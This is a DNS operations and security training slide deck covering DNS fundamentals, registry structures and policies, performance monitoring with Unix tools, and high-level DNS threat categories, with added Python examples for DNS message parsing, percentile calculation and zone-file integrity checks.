Welcome
Thank you!
APTLD Leonid Todorov
ICANN Steve Conte & John Crain
Introductions
Name?
Organization?
Duties?
Agenda
DNS Fundamentals
DNS TLD Registries
Performance Monitoring
DNS Threats
Incident Management & Response
Resilient Enterprises
Administrivia
During the course:
Ask questions when you have them; no need to wait
Your experiences are valuable; please share them
The schedule can be flexible; just ask!
DNS FUNDAMENTALS
Example: one root server, reachable over both IP versions
H.ROOT-SERVERS.NET   IPv4: 128.63.2.53   IPv6: 2001:500:1::803F:235
Distributed
There are literally millions of DNS servers all over the world. This adds resiliency to the system: if one goes down, there is usually another that can function in its place.
Hierarchical
Responsibility for a DNS server for any given domain is delegated
to the respective owner of that domain, who, in turn, may
outsource those functions to a provider.
Consistent
The same name (icann.org, st.icann.org, www.icann.org) resolves to the same answer wherever it is queried.
A Brief History
March 1982: Ken Harrenstien et al. release RFC 811, governing use of a hostname server with a centrally managed file which contains names and addresses.
The ARPANET grows; people want local control.
November 1983: Paul Mockapetris releases RFC 882 and RFC 883, governing the concepts and operation of the DNS.
November 1987: Paul Mockapetris releases RFC 1034 and RFC 1035, which refine the DNS.
The core pieces haven't changed since (23 years).
DNS Operation
At a core level, the DNS is comprised of queries and answers.
A user sends a query through a resolver to a server. The server responds with an answer to the query.
Query (User to DNS Server): What is www.icann.org?
Answer (DNS Server to User): 192.0.32.7
DNS Operation
A DNS message is structured as follows:
[Figure: DNS query packet layout, http://unixwiz.net/images/dns-query-packet.gif]
A message can be up to 65,535 bytes long over TCP; a classic UDP message is limited to 512 bytes unless EDNS(0) negotiates a larger size.
The header allows multiple questions and answers (QDCOUNT and ANCOUNT fields).
In practice servers answer only the first question and ignore or reject the rest, so a query carrying more than one question is itself a sign of something unusual.
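As an added example (not code from the original slides), the following parses the 12-byte DNS header and the question and answer sections exactly as RFC 1035 section 4.1 lays them out, over a constructed query for www.icann.org and a constructed response that answers it with the address shown on the slide. The message ID 0x1234 and the TTL of 300 are assumptions made for the example; the compression pointer in the answer and the QDCOUNT check are standard protocol behaviour.

```python
# Added example: not code from the original slides. Parses the DNS header
# and the question and answer sections (RFC 1035 section 4.1) of a
# constructed query and its constructed response for www.icann.org.
import struct

def decode_name(msg: bytes, offset: int):
    """Decode a label sequence at offset, following RFC 1035 4.1.4
    compression pointers. Returns (name, offset just past the name as it
    appears at the original position, not past the pointer target)."""
    labels = []
    end = None
    hops = 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2
            hops += 1
            if hops > 32:                               # malformed: pointer loop
                raise ValueError("compression pointer loop")
            offset = pointer
            continue
        if length == 0:                                 # root label ends the name
            if end is None:
                end = offset + 1
            break
        if length > 63:
            raise ValueError("label longer than 63 octets")
        offset += 1
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels) or ".", end

def parse_message(msg: bytes) -> dict:
    """Header plus question and answer sections; authority and additional
    records are counted but not decoded."""
    if len(msg) < 12:
        raise ValueError("shorter than the 12-byte DNS header")
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    out = {"id": ident, "is_response": bool(flags & 0x8000),
           "opcode": (flags >> 11) & 0xF, "rcode": flags & 0xF,
           "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
           "questions": [], "answers": []}
    off = 12
    for _ in range(qd):
        name, off = decode_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        out["questions"].append((name, qtype, qclass))
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:                   # A record: dotted quad
            rdata = ".".join(str(b) for b in rdata)
        out["answers"].append((name, rtype, ttl, rdata))
    # Servers answer only the first question; more than one is a red flag.
    out["multi_question"] = qd > 1
    return out

def encode_name(name: str) -> bytes:
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"

# Constructed query: ID 0x1234 (assumed), RD set, one question www.icann.org IN A.
QUERY = (struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
         + encode_name("www.icann.org") + struct.pack("!HH", 1, 1))

# Constructed response: QR, RD and RA set; the question echoed; one A record
# whose owner is a compression pointer (0xC00C) to the name at offset 12.
# TTL 300 is assumed; 192.0.32.7 is the address shown on the slide.
RESPONSE = (struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
            + encode_name("www.icann.org") + struct.pack("!HH", 1, 1)
            + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4)
            + bytes([192, 0, 32, 7]))

if __name__ == "__main__":
    print(parse_message(QUERY)["questions"])
    print(parse_message(RESPONSE)["answers"])
```

The hop limit in decode_name is the check a production parser needs: a crafted message whose pointer refers back to itself would otherwise loop forever.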
DNS Operation
[Figure: resolution walk-through. The User asks the ISP resolver; the resolver queries the Root, then .org, then the authoritative servers for icann.org, pir.org and first.org]
DNS Operation
A Tree view of the DNS
[Figure: . (Root) at the top; under .COM, example.com and www.example.com; under .ORG, icann.org and ftp.icann.org; the User reaches the tree through the ISP resolver]
New Registration
Registrations are not typically made at the top level; delegations are usually done here.
New Delegation
See http://dns.measurementfactory.com/surveys/openresolvers.html for more information on open resolvers!
Registry Structures
Registries Come in All Shapes and Sizes
Structure, Technical Implementation, Goals & Policies
Registry Structures
Registry 2R Model: Registry - Registrant
Registry provides direct registrations to consumers
Registrants request domains directly through the registry
Simple model
Doesn't scale without lots of work from the registry
Direct customer relationships
[Figure: Registry with two Registrants attached directly]
Registry Structures
Registry 2R Model with Reseller: Registry - (Reseller) - Registrant
Registry provides direct registrations to consumers
Registrants request domains directly through the registry or optionally through a reseller
Simple model
Direct customer relationships
Offloads some customer-interface work from the registry to the reseller
[Figure: Registry with one Registrant attached directly and one through a Reseller]
Registry Structures
Registry 3R Model: Registry - Registrar - Registrant
Registrars interface between the customer and the registry
[Figure: Registry, two Registrars, a Reseller under one of them, two Registrants]
Registry Structures
Registries can define WHERE their customer administrative data resides (WHOIS)
Thick: the registry stores all customer data for registrations regardless of WHERE it originates (direct, registrar) and serves it from the TLD's WHOIS
Thin: registrars manage all customer data for their registrants and serve this information via their own WHOIS
[Figure: Thick model with WHOIS at the TLD; Thin model with WHOIS at each Registrar]
Registry Structures
Registries define how subdomains are permitted, either at the top or second level.
Top-level delegations fall immediately under the TLD, e.g. google.jo (www.google.jo is a host within it); second-level delegations sit under a category label such as com.jo.
[Figure, repeated over several slides: registry name-server layout with NS1 and NS2 External, NS3 and NS4 Internal; the actors shown are the Registrant, a User and an International User]
Policies
Policies govern how registries operate, from internal workings to dealing with customers.
Policies can be derived from operational necessities, business goals, or best practices in use by other registries.
Policies vary by registry, and vary nearly as widely as the registries themselves.
It's important for registries to define policies so they respond and operate in a consistent manner.
Frequently there is no right or wrong policy; what matters is the registry's definition of that policy.
The wrong policy is NO policy.
Policy: Registrant Requirements
This policy defines the requirements to register a domain with the registry; specifically addresses issues like residency or ownership
Policy: Dispute Resolution
A controversial subject; one that is used infrequently, but must be defined before it's needed!
Disputes may arise between potential registrants for a domain name, each claiming the right to register it,
- or -
Policy: Registration Process
This policy defines how the registry accepts requests for registrations, validates them, and publishes them
Usually defined by operational necessity
Larger registries that process hundreds of registrations per day will use automated processes as much as possible
Smaller registries may use manual processes
Policy: Information Release (WHOIS)
This policy defines how the registry handles private information and what information it publishes publicly
The traditional approach is to publish administrative and technical point-of-contact information for each domain
BUT some registries / registrars offer an anonymous registration service which publishes empty or generic information
Policy: Pricing / Funding Model
This policy defines how much domain registrations, their renewal, transfer or other actions cost.
Additional or value-added services may also be defined
Policy: Permissible Registrations
This policy defines what domain names may be registered
Policy: Takedown
A very controversial topic; this defines how the registry may temporarily or permanently deactivate a registration
More importantly, under what circumstances it may do so.
A Hypothetical Example
Let's take the simple example of a registration made for the purpose of conducting a phishing attack.
The domain name closely resembles that used by an international bank
The registrant provides a fake name and address for registration
The registrant uses the domain to propagate a phishing attack, soliciting bank customers for their usernames and passwords.
Who's responsible and who's accountable?
The malicious registrant? How do you find him?
The registry? They didn't validate the registrant, but they get 5000 registrations a day; how can they?
The bank? They didn't educate their customers on phishing attacks
The bank user?
Take Aways
The DNS operationally is simple; organizationally, it's a much different story: there are many (widely varying) stakeholders involved
Policies define how registries operate, but are frequently ill-defined and untested
Unlike the traditional network security world, which has CERTs and NOCs focusing on operating systems and applications, the DNS has no equivalent structure focusing on security
PERFORMANCE MONITORING
Metrics: network, systems, services
Definitions
Planning: NOC, customers
Metrics
Network performance metrics
Channel capacity, nominal & effective
Channel utilization
Delay and jitter
Packet loss and errors
Metrics
System performance metrics
Availability
Memory, CPU utilization, load, I/O wait, etc.
Channel Utilization
What fraction of the nominal channel capacity is actually in use
Important!
Future planning
What utilization growth rate am I seeing?
For when should I plan on buying additional capacity?
Where should I invest for my upgrades?
Problem resolution
Where are my bottlenecks, etc.
95th Percentile
The smallest value that is larger than (or equal to) 95% of the values in a given sample
This means that 95% of the time the channel utilization is equal to or less than this value
Or rather, the peaks (the top 5% of samples) are discarded from consideration
[Figure: utilization graph with the 95th-percentile line drawn; the traffic above the line is the 5% that is discarded]
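Added example, not from the original slides: the 95th percentile computed as the slide defines it, over a constructed day of five-minute utilization samples on an assumed 100 Mbit/s link. It contrasts p95 with the peak so the "peaks are discarded" point is visible in numbers: a 45-minute burst moves the maximum to the ceiling but leaves the 95th percentile where the steady traffic sits.

```python
# Added example, not from the original slides. The 95th percentile as the
# slide defines it (the smallest sample that is >= 95% of the samples),
# computed over a constructed day of 5-minute utilization readings.
import math

def percentile(samples, pct):
    """Nearest-rank percentile: sort ascending and take the value at rank
    ceil(pct/100 * n). For pct=95 this is the smallest value that is
    greater than or equal to 95% of the samples."""
    if not samples:
        raise ValueError("no samples")
    ordered = sorted(samples)
    rank = math.ceil(pct / 100 * len(ordered))      # 1-based rank
    return ordered[max(rank, 1) - 1]

def utilization_report(mbps_samples, link_capacity_mbps):
    """What a NOC would bill or plan on (p95) next to what a graph shows (peak)."""
    p95 = percentile(mbps_samples, 95)
    peak = max(mbps_samples)
    return {
        "p95_mbps": p95,
        "peak_mbps": peak,
        "p95_utilization": p95 / link_capacity_mbps,
        "peak_utilization": peak / link_capacity_mbps,
        "samples_discarded": sum(1 for s in mbps_samples if s > p95),
    }

# Constructed data: 288 five-minute samples (one day) on a 100 Mbit/s link.
# Steady 20-40 Mbit/s, with a 45-minute burst (9 samples) to 95 Mbit/s.
SAMPLES = [20 + (i % 21) for i in range(288)]
for _i in range(120, 129):
    SAMPLES[_i] = 95

if __name__ == "__main__":
    print(utilization_report(SAMPLES, 100))
```

The burst is only 9 of 288 samples (3% of the day), so it falls entirely inside the discarded 5%; a burst lasting more than 5% of the sampling window would start to raise p95, which is exactly the behaviour a capacity planner wants.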
End-to-end Delay
The time required to transmit a packet along its entire path
Created by an application, handed over to the OS, passed to a network card (NIC), encoded, transmitted over a physical medium (copper, fibre, air), received by an intermediate device (switch, router), analyzed, retransmitted over another medium, etc.
The most common measurement uses ping for total round-trip time (RTT).
Jitter
[Figure: latency and jitter graph from Smokeping]
Local Analysis
As we know...
Before we blame the network, let's verify whether the problem is ours.
What can go wrong locally?
Hardware problems
Excessive load (CPU, memory, I/O)
Memory: real, virtual
I/O (Input/Output): storage, network
Key Indicators
Insufficient CPU
Number of processes waiting to execute is always high
High CPU utilization (load avg.)
Insufficient memory
Very little free memory
Lots of swap activity (swap in, swap out)
Slow I/O
Lots of blocked processes
High number of block transfers
Local Analysis
Luckily, in Unix there are dozens of useful tools that give us lots of useful information about our machine
Some of the more well-known include:
vmstat
top
lsof
netstat
tcpdump
wireshark (ethereal)
iptraf
iperf
vmstat
Shows periodic summary information about processes, memory, paging, I/O, CPU state, etc.
top
Basic performance tool for Unix/Linux environments
Periodically shows a list of system performance statistics:
CPU use
RAM and swap memory usage
Load average (runnable processes averaged over 1, 5 and 15 minutes; on Linux it also counts processes blocked in uninterruptible I/O, so it is not a CPU percentage)
Information by process
top cont.
Information by process (most relevant
columns shown):
PID: Process ID
USER: user running (owner) of the process
%CPU: Percentage of CPU utilization by the
process since the last sample
%MEM: Percentage of physical memory (RAM)
used by the process
TIME: Total CPU time used by the process since it
was started
netstat
Shows us information about:
Network connections
Routing tables
Interface (NIC) statistics
Multicast group members
netstat
Some useful options
-n: Show addresses, ports and user IDs in numeric form
-r: Routing table
-s: Statistics by protocol
-i: Status of interfaces
-l: Listening sockets
--tcp, --udp: Specify the protocol
-A: Address family [inet | inet6 | unix | etc.]
-p: Show the PID and name of the process that owns each socket (run as root to see other users' processes)
-c: Show output/results continuously
netstat
Examples:
# netstat -n --tcp -c
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address              Foreign Address              State
tcp        0    272 ::ffff:192.188.51.40:22    ::ffff:128.223.60.27:60968   ESTABLISHED
tcp        0      0 ::ffff:192.188.51.40:22    ::ffff:128.223.60.27:53219   ESTABLISHED

(Right-hand columns of a second, listening-socket listing on the same slide; the Local Address column was not recovered)
Foreign Address   State    PID/Program name
0.0.0.0:*         LISTEN   11645/snmpd
0.0.0.0:*         LISTEN   1997/mysqld

# netstat -ic
Kernel Interface table
Iface    MTU Met   RX-OK RX-ERR RX-DRP RX-OVR
eth0    1500   0 2155901      0      0      0
lo     16436   0   18200      0      0      0
eth0    1500   0 2155905      0      0      0
lo     16436   0   18200      0      0      0
eth0    1500   0 2155907      0      0      0
lo     16436   0   18200      0      0      0
eth0    1500   0 2155910      0      0      0
lo     16436   0   18200      0      0      0
eth0    1500   0 2155913      0      0      0
netstat cont.
Examples:
# netstat --tcp --listening --program
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address         Foreign Address   State    PID/Program name
tcp        0      0 *:5001                *:*               LISTEN   13598/iperf
tcp        0      0 localhost:mysql       *:*               LISTEN   5586/mysqld
tcp        0      0 *:www                 *:*               LISTEN   7246/apache2
tcp        0      0 t60-2.local:domain    *:*               LISTEN   5378/named
tcp        0      0 t60-2.local:domain    *:*               LISTEN   5378/named
tcp        0      0 t60-2.local:domain    *:*               LISTEN   5378/named
tcp        0      0 localhost:domain      *:*               LISTEN   5378/named
tcp        0      0 localhost:ipp         *:*               LISTEN   5522/cupsd
tcp        0      0 localhost:smtp        *:*               LISTEN   6772/exim4
tcp        0      0 localhost:953         *:*               LISTEN   5378/named
tcp        0      0 *:https               *:*               LISTEN   7246/apache2
tcp6       0      0 [::]:ftp              [::]:*            LISTEN   7185/proftpd
tcp6       0      0 [::]:domain           [::]:*            LISTEN   5378/named
tcp6       0      0 [::]:ssh              [::]:*            LISTEN   5427/sshd
tcp6       0      0 [::]:3000             [::]:*            LISTEN   17644/ntop
tcp6       0      0 ip6-localhost:953     [::]:*            LISTEN   5378/named
tcp6       0      0 [::]:3005             [::]:*            LISTEN   17644/ntop
netstat cont.
$ sudo netstat -atup
Active Internet connections (servers and established) (if run as root, PID/Program name is included)
Proto Recv-Q Send-Q Local Address            Foreign Address   State    PID/Program name
tcp        0      0 *:35586                  *:*               LISTEN   2540/ekpd
tcp        0      0 localhost:mysql          *:*               LISTEN   2776/mysqld
tcp        0      0 *:www                    *:*               LISTEN   14743/apache2
tcp        0      0 d229-231.uoregon:domain  *:*               LISTEN   2616/named
tcp        0      0 *:ftp                    *:*               LISTEN   3408/vsftpd
tcp        0      0 localhost:domain         *:*               LISTEN   2616/named
tcp        0      0 *:ssh                    *:*               LISTEN   2675/sshd
tcp        0      0 localhost:ipp            *:*               LISTEN   3853/cupsd
tcp        0      0 localhost:smtp           *:*               LISTEN   3225/exim4
tcp        0      0 localhost:953            *:*               LISTEN   2616/named
tcp        0      0 *:https                  *:*               LISTEN   14743/apache2
tcp6       0      0 [::]:domain              [::]:*            LISTEN   2616/named
tcp6       0      0 [::]:ssh                 [::]:*            LISTEN   2675/sshd
tcp6       0      0 ip6-localhost:953        [::]:*            LISTEN   2616/named
udp        0      0 *:50842                  *:*                        3828/avahi-daemon:
udp        0      0 localhost:snmp           *:*                        3368/snmpd
udp        0      0 d229-231.uoregon:domain  *:*                        2616/named
udp        0      0 localhost:domain         *:*                        2616/named
udp        0      0 *:bootpc                 *:*                        13237/dhclient
udp        0      0 *:mdns                   *:*                        3828/avahi-daemon:
udp        0      0 d229-231.uoregon.ed:ntp  *:*                        3555/ntpd
udp        0      0 localhost:ntp            *:*                        3555/ntpd
udp        0      0 *:ntp                    *:*                        3555/ntpd
udp6       0      0 [::]:domain              [::]:*                     2616/named
udp6       0      0 fe80::213:2ff:fe1f::ntp  [::]:*                     3555/ntpd
udp6       0      0 ip6-localhost:ntp        [::]:*                     3555/ntpd
udp6       0      0 [::]:ntp                 [::]:*                     3555/ntpd
lsof
Example:
First, using netstat -ln --tcp, determine that port 6010 is open and waiting for a connection (LISTEN)
# netstat -ln --tcp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address   State
tcp        0      0 127.0.0.1:6010    0.0.0.0:*         LISTEN
tcp        0      0 127.0.0.1:6011    0.0.0.0:*         LISTEN
lsof
Determine what process has the port (6010) open and what other resources are being used:
# lsof -i tcp:6010
COMMAND   PID USER   FD   ...
sshd    10301 root   6u   ... 53603 ...
sshd    10301 root   7u   ... 53604 ...
(the remaining columns of this listing were not recovered)

# lsof -p 10301
COMMAND   PID USER  FD  TYPE DEVICE   SIZE    NODE NAME
sshd    10301 root  cwd DIR     8,2   4096       2 /
sshd    10301 root  rtd DIR     8,2   4096       2 /
sshd    10301 root  txt REG     8,2 379720 1422643 /usr/sbin/sshd
sshd    10301 root  mem REG     8,2  32724 1437533 /usr/lib/libwrap.so.0.7.6
sshd    10301 root  mem REG     8,2  15088 3080329 /lib/libutil-2.4.so
sshd    10301 root  mem REG     8,2  75632 1414093 /usr/lib/libz.so.1.2.3
sshd    10301 root  mem REG     8,2  96040 3080209 /lib/libnsl-2.4.so
sshd    10301 root  mem REG     8,2 100208 1414578 /usr/lib/libgssapi_krb5.so.2.2
sshd    10301 root  mem REG     8,2  11684 1414405 /usr/lib/libkrb5support.so.0.0
sshd    10301 root  mem REG     8,2  10368 3080358 /lib/libsetrans.so.0
sshd    10301 root  mem REG     8,2   7972 3080231 /lib/libcom_err.so.2.1
sshd    10301 root  mem REG     8,2  30140 1420233 /usr/lib/libcrack.so.2.8.0
sshd    10301 root  mem REG     8,2  11168 3080399 /lib/security/pam_succeed_if.so
...
lsof cont.
What network services am I running?
# lsof -i
COMMAND   PID        USER   FD  PROTO NAME
firefox  4429      hervey  50u  TCP   ...->128.223.60.21:www (ESTABLISHED)
named    5378        bind  20u  TCP   *:domain (LISTEN)
named    5378        bind  21u  TCP   localhost:domain (LISTEN)
sshd     5427        root   3u  TCP   *:ssh (LISTEN)
cupsd    5522        root   3u  TCP   localhost:ipp (LISTEN)
mysqld   5586       mysql  10u  TCP   localhost:mysql (LISTEN)
snmpd    6477        snmp   8u  UDP   localhost:snmp
exim4    6772 Debian-exim   3u  TCP   localhost:smtp (LISTEN)
ntpd     6859         ntp  16u  UDP   *:ntp
ntpd     6859         ntp  17u  UDP   *:ntp
ntpd     6859         ntp  18u  UDP   [fe80::250:56ff:fec0:8]:ntp
ntpd     6859         ntp  19u  UDP   ip6-localhost:ntp
proftpd  7185     proftpd   1u  TCP   *:ftp (LISTEN)
apache2  7246    www-data   3u  TCP   *:www (LISTEN)
apache2  7246    www-data   4u  TCP   *:https (LISTEN)
...
iperf   13598        root   3u  ...
apache2 27088    www-data   3u  ...
apache2 27088    www-data   4u  ...
(TYPE, DEVICE and SIZE columns, and the NAME of the last three rows, were not recovered)
iptraf
Many measurable statistics and functions
By protocol/port
By packet size
Generates logs
Utilizes DNS to translate addresses
Advantages
Simplicity
Menu-based (uses curses)
Flexible configuration
iptraf
You can run it periodically in the background (-B)
This allows you, for example, to run it as a cron job to periodically analyze logs, generate alarms, save to a database, etc.
Has a great name... Interactive Colorful IP LAN Monitor
iptraf -i eth0
[Figure: sample iptraf output from the above command]
iperf
To measure network throughput between two points
iperf has two modes, server and client
Easy to use
Great to help determine optimal TCP parameters
TCP window size (socket buffer)
MTU / maximum segment size
See man iperf for more
iperf
Using UDP you can generate packet loss and jitter reports
You can run multiple parallel sessions using threads
Supports IPv6
iperf parameters
Usage: iperf [-s|-c host] [options]
       iperf [-h|--help] [-v|--version]
Client/Server:
  -f, --format    [kmKM]  format to report: Kbits, Mbits, KBytes, MBytes
  -i, --interval  #       seconds between periodic bandwidth reports
  -l, --len       #[KM]   length of buffer to read or write (default 8 KB)
  -m, --print_mss         print TCP maximum segment size (MTU - TCP/IP header)
  -p, --port      #       server port to listen on/connect to
  -u, --udp               use UDP rather than TCP
  -w, --window    #[KM]   TCP window size (socket buffer size)
  -B, --bind      <host>  bind to <host>, an interface or multicast address
  -C, --compatibility     for use with older versions; does not send extra msgs
  -M, --mss       #       set TCP maximum segment size (MTU - 40 bytes)
  -N, --nodelay           set TCP no delay, disabling Nagle's Algorithm
  -V, --IPv6Version       set the domain to IPv6
Server specific:
  -s, --server            run in server mode
  -U, --single_udp        run in single threaded UDP mode
  -D, --daemon            run the server as a daemon
Client specific:
  -b, --bandwidth #[KM]   for UDP, bandwidth to send at in bits/sec (default 1 Mbit/sec, implies -u)
  -c, --client    <host>  run in client mode, connecting to <host>
  -d, --dualtest          do a bidirectional test simultaneously
  -n, --num       #[KM]   number of bytes to transmit (instead of -t)
  -r, --tradeoff          do a bidirectional test individually
  -t, --time      #       time in seconds to transmit for (default 10 secs)
  -F, --fileinput <name>  input the data to be transmitted from a file
  -I, --stdin             input the data to be transmitted from stdin
  -L, --listenport #      port to receive bidirectional tests back on
  -P, --parallel  #       number of parallel client threads to run
  -T, --ttl       #       time-to-live, for multicast (default 1)
iperf - TCP
$ iperf -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 85.3 KByte (default)
------------------------------------------------------------
[ 4] local 128.223.157.19 port 5001 connected with 201.249.107.39 port 39601
[ 4] 0.0-11.9 sec 608 KBytes 419 Kbits/sec

# iperf -c nsrc.org
------------------------------------------------------------
Client connecting to nsrc.org, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[ 3] local 192.168.1.170 port 39601 connected with 128.223.157.19 port 5001
[ 3] 0.0-10.3 sec 608 KBytes 485 Kbits/sec
iperf - UDP
# iperf -c host1 -u -b100M
------------------------------------------------------------
Client connecting to nsdb, UDP port 5001
Sending 1470 byte datagrams
UDP buffer size:  106 KByte (default)
------------------------------------------------------------
[ 3] local 128.223.60.27 port 39606 connected with 128.223.250.135 port 5001
[ 3] 0.0-10.0 sec   114 MBytes 95.7 Mbits/sec
[ 3] Sent 81377 datagrams
[ 3] Server Report:
[ 3] 0.0-10.0 sec   114 MBytes 95.7 Mbits/sec 0.184 ms 1/81378 (0.0012%)

$ iperf -s -u -i 1
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size:  108 KByte (default)
------------------------------------------------------------
[ 3] local 128.223.250.135 port 5001 connected with 128.223.60.27 port 39606
[ 3] 0.0- 1.0 sec 11.4 MBytes 95.4 Mbits/sec 0.184 ms 0/ 8112 (0%)
[ 3] 1.0- 2.0 sec 11.4 MBytes 95.7 Mbits/sec 0.177 ms 0/ 8141 (0%)
[ 3] 2.0- 3.0 sec 11.4 MBytes 95.6 Mbits/sec 0.182 ms 0/ 8133 (0%)
...
[ 3] 8.0- 9.0 sec 11.4 MBytes 95.7 Mbits/sec 0.177 ms 0/ 8139 (0%)
[ 3] 9.0-10.0 sec 11.4 MBytes 95.7 Mbits/sec 0.180 ms 0/ 8137 (0%)
[ 3] 0.0-10.0 sec  114 MBytes 95.7 Mbits/sec 0.184 ms 1/81378 (0.0012%)
Bibliography
Monitoring Virtual Memory with vmstat
http://www.linuxjournal.com/article/8178
TCPDump Tutorial
http://inst.eecs.berkeley.edu/~ee122/fa06/projects/tcpdump-6up.pdf
DNS THREATS
Cyber Threats
Open Question: What Cyber Threats Concern You?
Disruption of DNS Resolution Services
Falsified Registrant Information
Someone Stealing Your Customer Data
Hackers Using Your Registry for BotNet Control
Attack Categories
[Figure: the eight categories arranged along two axes, Time & Effort and Concurrency]
Foothold
Reconnaissance & Enumeration
Privilege Escalation
Persistence
Malicious Use
Corruption
Data Exfiltration
Disruption
Some attacks may involve multiple categories
Foothold
Initial attempts to access and establish a remote connection into the network
Direct
SQL Injection, Operating System Exploits
Indirect
Phishing Email with Malware Attachments
Website-Hosted Malware Installations
Motivations
Gain Access for Future Attacks; this is usually an enabling attack
Foothold Attacks
These attacks will target your servers and workstations: anything that is accessible over the network
Accessible Email, Web, Remote Administration, etc.
http://news.softpedia.com/news/PDF-Based-Targeted-Attack-Against-Military-Contractors-Spotted-212139.shtml
fraudwatchinternational.com
Others?
Reconnaissance & Enumeration: what a zone file tells an attacker
[dns1.example.net]
example.net. SOA dns01.example.net test.dns02.example.net. (1
3600 600 86400 3600)
example.net. NS dns01.example.net
example.net. NS dns02.example.net
example.net. MX 10 email.example.net
testpc TXT "payment processing computer"
testpc A 10.10.10.2
adminspc TXT "Administrators PC"
adminspc A 10.10.10.3
test CNAME adminspc.test.net
[The slide highlights in turn the MX record (the email server), the descriptive TXT records, and the CNAME pointing outside the zone]
Network Monitoring
Know Who's Looking at You
Internal & External
Information Control
Limit the available information (ports, banners, zone file)
Privilege Escalation
Obtaining credentials, beyond what is normally available, for the purpose of accessing systems or information
Username / Password Cracking
Social Engineering
Exploiting Trust Relationships
Motivations
Gain Access to Information or for Future Attacks
Network Monitoring
Track failed login attempts
Track usage of trusted paths (e.g. EPP requests)
Anti-virus / Anti-spyware
Others?
Corruption
Modifying information or content on a system or application
Website Defacement
Cache Poisoning
Name Server Redirection
Corruption Attacks
Corruption Attacks Will Target Your Data Stores
File Servers, Name Servers
May Also Target Recursive Name Servers
Business & Operations Networks
Insider too!
Corruption Attacks
http://www.rankmyhack.com/
So many defacements
http://www.zone-h.org/archive/special=1
http://www.thehackernews.com/2011/08/rankmyhack-got-hacked-by-haxor.html
Corruption Example
Name Server Registration Redirection
Recall CheckFree.com!
Non-Authoritative Spoofing
Partido Colorado: a political statement made by one organization against another during an election
Corruption Example
Partido Colorado: the ISP (Copaco) modified its own recursive name servers to redirect users looking for partidocolorado.org
[Figure: the two A record addresses shown, 201.217.51.114 and 66.249.01.121]
Internal Monitoring
Compare to a Known-Good (read-only!) Copy
Implies you are making backups on a regular basis
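Added example, not from the original slides, serving two points made on this page: "limit the available information (ports, banners, zone file)" under Network Monitoring, and "compare to a known-good (read-only!) copy" under Internal Monitoring. A small parser for the zone text shown on the slides feeds two checks: an information-leakage audit that flags free-text TXT records and CNAMEs handing a name in the zone to another zone, and a set difference between the live zone and the read-only baseline that calls out changes to record types an attacker would alter to redirect traffic or mail (SOA, NS, MX, A, AAAA, CNAME). The baseline is the slide's example.net zone; the "live" copy and the host mail.example.org are constructed for the example.

```python
# Added example: not code from the original slides. Parses the example.net
# zone from the slides, audits it for information leakage, and diffs a
# constructed "live" copy against it as the read-only known-good baseline.
import re

ORIGIN = "example.net"
REDIRECT_TYPES = {"SOA", "NS", "MX", "A", "AAAA", "CNAME"}
MACHINE_TXT = re.compile(r'"?v=(spf1|DKIM1|DMARC1)', re.I)   # TXT records that belong

def parse_zone(text, origin=ORIGIN):
    """Return a set of (owner, type, rdata) tuples for the subset of
    master-file syntax used on the slides: one record per line, a
    parenthesised SOA continued over lines, relative owner names."""
    text = re.sub(r"\(([^)]*)\)", lambda m: " ".join(m.group(1).split()), text)
    records = set()
    for line in text.splitlines():
        line = line.split(";")[0].strip()
        if not line or line.startswith("["):         # blank, comment, [server] tag
            continue
        owner, rtype, rdata = line.split(None, 2)
        if not owner.endswith("."):
            owner = f"{owner}.{origin}."
        records.add((owner.lower(), rtype.upper(), " ".join(rdata.split())))
    return records

def audit_leakage(records, origin=ORIGIN):
    """Flag records that tell an attacker more than they need: free-text
    TXT records and CNAMEs handing a name in this zone to another zone."""
    findings = []
    for owner, rtype, rdata in sorted(records):
        if rtype == "TXT" and not MACHINE_TXT.match(rdata):
            findings.append(f"{owner} TXT is a description, not a machine record: {rdata}")
        if rtype == "CNAME":
            target = rdata.rstrip(".").lower()
            if target != origin and not target.endswith("." + origin):
                findings.append(f"{owner} CNAME points outside the zone: {rdata}")
    return findings

def diff_against_baseline(live, baseline):
    """Set difference against the read-only copy; records of types that
    redirect traffic or mail are called out separately."""
    added, removed = live - baseline, baseline - live
    return {"added": sorted(added), "removed": sorted(removed),
            "redirect_risk": sorted(r for r in added | removed if r[1] in REDIRECT_TYPES)}

# The zone from the slides, as the read-only known-good copy.
BASELINE_ZONE = """\
example.net. SOA dns01.example.net test.dns02.example.net. (1
  3600 600 86400 3600)
example.net. NS dns01.example.net
example.net. NS dns02.example.net
example.net. MX 10 email.example.net
testpc TXT "payment processing computer"
testpc A 10.10.10.2
adminspc TXT "Administrators PC"
adminspc A 10.10.10.3
test CNAME adminspc.test.net
"""

# Constructed "live" copy: the MX now points outside the zone (mail.example.org
# is an assumed attacker host) and an unexpected www record has appeared.
LIVE_ZONE = (BASELINE_ZONE.replace("MX 10 email.example.net", "MX 10 mail.example.org")
             + "www A 10.10.10.9\n")

if __name__ == "__main__":
    base, live = parse_zone(BASELINE_ZONE), parse_zone(LIVE_ZONE)
    for f in audit_leakage(base):
        print("leak:", f)
    for r in diff_against_baseline(live, base)["redirect_risk"]:
        print("changed:", r)
```

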